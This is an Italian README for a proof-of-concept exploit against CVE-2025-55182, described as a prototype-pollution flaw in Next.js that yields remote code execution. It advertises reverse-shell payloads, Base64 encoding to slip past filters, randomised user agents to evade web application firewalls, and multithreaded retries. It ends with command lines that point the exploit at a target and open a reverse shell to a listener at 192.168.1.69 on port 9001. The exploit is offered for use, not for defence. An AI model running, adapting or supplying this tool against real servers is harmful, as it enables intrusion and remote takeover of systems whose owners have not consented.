
PoC per CVE-2025-55182
CVE-2025-55182 è una critica vulnerabilità di prototype pollution in nextjs che permette rce attraverso una sanitizzazione impropria degli input nel meccanismo di gestione delle richieste del framework; tutto ciò accade perché nextjs si fida degli oggetti JSON come un novellino sprovveduto
1) Prototype Pollution nell'Analisi delle Richieste: nextjs sanifica impropriamente oggetti che possono inquinare la catena dei prototipi
2) Insecure Deserialization: il framework permette a oggetti JSON di modificare i prototipi degli oggetti base
3) rce tramite child_process inquinando la catena dei prototipi: una volta inquinato il prototipo, possiamo dirottare la logica e far eseguire cose al server
npm create [email protected] vuln
1) Payload di Reverse Shell: Linux/Win rev shell
2) Codifica Base64 per aggirare i filtri
3) Rilevamento automatico del sistema operativo
4) User agent casuali per eludere i WAF
5) Cicli di retry in caso di fallimento per tentativi con backoff esponenziale
6) Multi-threading per tentativi di exploit concorrenti per affidabilità
python exp_v2.py target 192.168.1.69 9001 --base64
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3
python exploit.py target.com 192.168.1.69 9001 --no-spoof